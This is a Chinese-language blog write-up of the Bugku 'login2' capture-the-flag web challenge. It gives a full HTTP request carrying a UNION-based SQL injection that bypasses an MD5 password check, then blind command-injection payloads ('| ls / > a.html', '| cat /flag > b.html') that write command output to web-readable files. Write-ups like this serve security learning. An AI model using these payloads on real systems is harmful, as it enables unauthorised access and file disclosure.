bugku-web-login2

最新推荐文章于 2024-07-04 16:37:43 发布
最新推荐文章于 2024-07-04 16:37:43 发布
阅读量871 收藏 5
点赞数 29
分类专栏: CTF靶场 文章标签: 前端 web安全 CTF 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75121443/article/details/137918856
版权

这里提示是命令执行

抓包发现有五个报文
其中login.php中有base64加密语句

$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}

这里得到SQL语句的组成,开始绕过密码判断

POST /login.php HTTP/1.1
Host: 114.67.175.224:14715
Content-Length: 52
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.67.175.224:14715
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://114.67.175.224:14715/login.php?password=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_c1b044f909411ac4213045f0478e96fc=1711286763; _ga=GA1.1.52075818.1711286767; _ga_F3VRZT58SJ=GS1.1.1711288951.2.1.1711290145.0.0.0; PHPSESSID=ohlo1q3nbms2srg6aav8cgase6
Connection: close

username=admin'UNION SELECT 1,md5(123)#&password=123

这里账号为admin,然后使用联合查询使得返回的两个空格,1空格代表账号,二空格代表密码,这里我们直接将二空格的密码填充为123的md5值,$row['password']得到的就是这个123的md5值,而我们用password传递的123就会变成$password,这时$row['password']===md5($password)为真,成功绕过密码

来到服务查询页面

试了试ssh等服务查询

开始命令执行绕过
命令执行没有回显

利用sleep看看是否执行了

这里确实是执行了,但是没有回显
将结果写成可访问文件

| ls / > a.html

访问得到命令执行回显
看到flag文件

| cat /flag > b.html

得到flag

白牧羊人
关注
  • 29
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
bugku-Web-login2(SKCTF)(union注入绕过密码、反弹shell)
Sea_Sand息禅
04-06 2955
hint:union,命令执行 我们的第一步就是要利用union注入进行登录了,bp抓个包看看: 相应头这里还是给了我们一个tip的,base64解码得到: $sql="SELECT username,password FROM admin WHERE username='".$username."'"; if (!empty($row) && $row['passwor...
bugku-writeup-web-社工-初步收集
dark的博客
06-18 680
题目:社工-ch
BUGKU-WEB 社工-初步收集
天泽岁月
02-15 1696
BUGKU-WEB 社工-初步收集,授权码变了....
bugku - Web
UP's blog
09-03 2011
刚刚入门CTF,如有错误,望大佬指教
bugku-web-login2(SKCTF)
weixin_42444939的博客
08-29 843
login页面,日常先抓包康康 看样子这玩意儿也不会有啥回显 估计又要盲注(初步构想
Bugku web login2
qq_41696858的博客
07-26 508
今天中午忙着去吃饭,场景过时了,就没法录视频了,简单说一下吧: 前面都一样,通过sql注入过登录界面,先随便提交点啥,burp抓包,发现response有base64编码内容,解码发现是php代码 $sql="SELECT username,password FROM admin WHERE username='".$username."'"; if (!empty($row) && $row['password']===md5($password)){ } 由于没有限制行数,盲猜可以un
bugku-web-login1
m0_53900267的博客
09-19 113
在吗,看看原理? 这里百度到大佬的解释: https://www.cnblogs.com/ECJTUACM-873284962/p/8977983.html 你管这叫wp?? 打开题目,先注册试试。 账号:aaa 密码:AAAaaa111 然后登录,提示我不是管理员还想看flag? 然后我们就开始sql约束攻击。 看过上面的原理,相信大家已经知道了答案。 sql限制输入的字符个数,所以注册的时候输入admin
bugku-web-点login咋没反应
qq_75121443的博客
04-15 352
请求114.67.175.224:13051这个地址,而不是114.67.175.224:13051?,先得到字符串ctf.bugku.com的序列号参数s:13:"ctf.bugku.com";这里让在cookie中添加参数BUGKU,并使参数为字符串类型ctf.bugku.com。这里在cookie中添加参数BUGKU,并将字符串的序列号参数填入为值。访问后看到一个注释,叫尝试?在页面源码中看到一个css文件。并看到构建的表是post请求。
bugku- web -login3
小锤队长的博客
08-23 300
login3(过滤了 空格、=、union、逗号、and、where等字符的 布尔型盲注) 首先 试一下 admin 和 admin 提示 password error!(这里知道用户名 admin是存在的) 这里知道了用户名 admin,那用万能密码试一下呗 输入密码: admin' or 1 =1 # 提示password error !应该是有 过滤吧 用 自己写的 sql...
ng2-login demo
09-27
【ng2-login demo】是一个基于Angular 2(现在应该是Angular,因为Angular 2已经更新了多个版本)构建的登录组件示例。这个项目为开发者提供了一个快速启动的模板,特别是对于那些正在学习Angular或者需要在自己的...
disconf-web简化可部署版
06-20
2. **简化部署流程**: - **无需Nginx**:简化后的disconf-web可以直接在Tomcat上运行,省去了配置Nginx反向代理的步骤。 - **直接部署**:只需将压缩包解压至Tomcat的webapps目录下,然后启动Tomcat即可。 - **...
sns-login sns-login
05-11
7. **适应性**:sns-login需要适配不同平台和设备,包括Web、iOS、Android等,确保跨平台的兼容性和一致性。 8. **错误处理与异常流程**:当用户授权失败或取消授权时,应用需要有合适的错误处理机制,引导用户进行...
2-login.defs
07-20
2-login.defs
hht-cweb-login
03-31
Vue网络一个Vue.js项目构建设置# install dependenciesnpm install# serve with hot reload at localhost:8080npm run dev# build for production with minificationnpm run build# build for production and view ...
前端面试题(12)答案版
weixin_49062485的博客
06-30 668
在不同的操作系统上,设置环境变量的方式有所不同,比如在Windows上使用set命令,在Unix/Linux上使用export命令。-2) setImmediate:是Node.js中的特有API,属于微任务,会被添加到微任务队列中,在事件循环的微任务阶段执行。2) 执行完所有宏任务后,检查微任务队列(如Promise.then)是否有待执行的任务,依次执行。- 1)setTimeout:是宏任务,会被添加到宏任务队列中,在事件循环的宏任务阶段执行。在前端面试中,考察这些基本概念是非常常见的。
WHAT - NextJS 的路由系统和 react-router-dom
最新发布
weixin_58540586的博客
07-04 667
不,Next.js 的路由系统并不基于。Next.js 本身内置了自己的路由系统,并且在其生命周期和工作方式上与有所不同。
JavaScript检查对象是否包含某个属性
徐三岁的博客
06-28 959
当使用 Object.prototype.hasOwnProperty.call 时,实际上是在调用 hasOwnProperty 方法,并明确指定 this 的值,这使得可以检查任何对象是否拥有指定的属性。使用 Object.prototype.hasOwnProperty.call 的好处是,它允许将 hasOwnProperty 方法作为一个函数传递给其他函数,或者在不直接引用对象的情况下使用它。hasOwnProperty 方法会检查对象自身是否具有指定的属性,而不考虑原型链。
探索WebKit的插件帝国:深入插件系统的奥秘
2401_85763803的博客
06-30 454
WebKit的插件系统允许第三方开发者扩展浏览器的功能。插件可以拦截网页中的特定资源请求,执行自定义的代码,并以各种形式与用户交互。通过本文的深入探讨,你现在应该对WebKit的插件系统有了全面的理解。从插件的创建到生命周期管理,再到性能优化和安全性考虑,本文提供了一个全面的指南。WebKit插件系统的强大功能,为开发者提供了广阔的创新空间。
linux --no-login
05-10
`--no-login`是一个选项,用于在不执行登录 shell 的情况下启动 shell。它通常用于执行特定任务的脚本或命令,而不需要用户交互式地登录到系统中。例如,您可以使用以下命令执行脚本而无需登录: ``` $ /bin/bash -...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值